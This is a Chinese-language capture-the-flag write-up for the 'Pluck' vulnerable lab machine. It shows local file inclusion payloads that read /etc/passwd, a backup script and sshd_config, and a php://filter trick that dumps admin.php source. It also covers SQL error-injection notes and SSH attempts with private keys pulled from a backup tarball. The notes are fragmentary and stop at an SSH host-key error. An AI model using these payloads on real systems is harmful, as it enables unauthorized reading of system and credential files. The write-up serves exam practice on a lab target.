Pluck(本地文件包含+内核漏洞提权)

靶机下载地址

192.168.1.115


22/tcp   open  ssh     OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

mysql -h 192.168.1.115  -u root -p
Enter password: 
ERROR 1130 (HY000): Host '192.168.1.102' is not allowed to connect to this MySQL server

本地文件包含

http://192.168.1.115/index.php?page=contact.php

存在本地文件包含漏洞，可以达到任意文件读取的目的。

http://192.168.1.115/index.php?page=/etc/passwd

bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
---

http://192.168.1.115/index.php?page=/usr/local/scripts/backup.sh

文件内容如下
#Backup directories in /backups so we can get it via tftp

echo "Backing up data"
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null

tar -cf是建立备份文档的意思
---
wget http://192.168.1.115/index.php?page=/backups/backup.tar

该备份文档只进行了打包，没有压缩，下图可见文件绝对路径。

ssh -i id.rsa paul@IP
ssh peter@192.168.1.103
无法连接

查看ssh配置
http://192.168.1.103/index.php?page=/etc/ssh/sshd_config
查找资料后发现，ssh私钥是这样的格式。

1
2
3

-----BEGIN RSA PRIVATE KEY-----
xxx省略
-----END RSA PRIVATE KEY-----

而路径中有/home/paul/keys/id_key2、/home/paul/keys/id_key3等等，只有找到正确的ssh私钥才能连接。

sql注入

sql报错注入。因为oscp考试不允许使用自动化利用的工具，于是我特地手动利用，不使用sqlmap。

admin.php

http://192.168.1.103/index.php?page=php://filter/convert.base64-encode/resource=admin.php

关键代码在这一行

if(strpos($_POST['email'], '\'') !== false) {
	echo  "<strong>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 6</strong>";
}else{
	echo  "<strong>Incorrect Username or Password!</strong>";
}

strpos — 查找字符串首次出现的位置
如果email中存在单引号，就会提示一串sql语法错误。

查看writeup

以前没有遇到这种ssh登陆错误。

ssh -v -i id.rsa4 paul@192.168.1.103

OpenSSH_8.0p1 Debian-3, OpenSSL 1.1.1c  28 May 2019
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: Applying options for *
debug1: Connecting to 192.168.1.103 [192.168.1.103] port 22.
debug1: Connection established.
debug1: identity file id.rsa4 type -1
debug1: identity file id.rsa4-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_8.0p1 Debian-3
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.3p1 Ubuntu-1
debug1: match: OpenSSH_7.3p1 Ubuntu-1 pat OpenSSH_7.0*,OpenSSH_7.1*,OpenSSH_7.2*,OpenSSH_7.3*,OpenSSH_7.4*,OpenSSH_7.5*,OpenSSH_7.6*,OpenSSH_7.7* compat 0x04000002
debug1: Authenticating to 192.168.1.103:22 as 'paul'
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256@libssh.org
debug1: kex: host key algorithm: rsa-sha2-512
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: Server host key: ssh-rsa SHA256:6k4RLcLMdnm7mjtP4Kh+t6wSWNuYpHtRT3tkINCk1wY
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
SHA256:6k4RLcLMdnm7mjtP4Kh+t6wSWNuYpHtRT3tkINCk1wY.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending RSA key in /root/.ssh/known_hosts:1
  remove with:
  ssh-keygen -f "/root/.ssh/known_hosts" -R "192.168.1.103"
RSA host key for 192.168.1.103 has changed and you have requested strict checking.
Host key verification failed.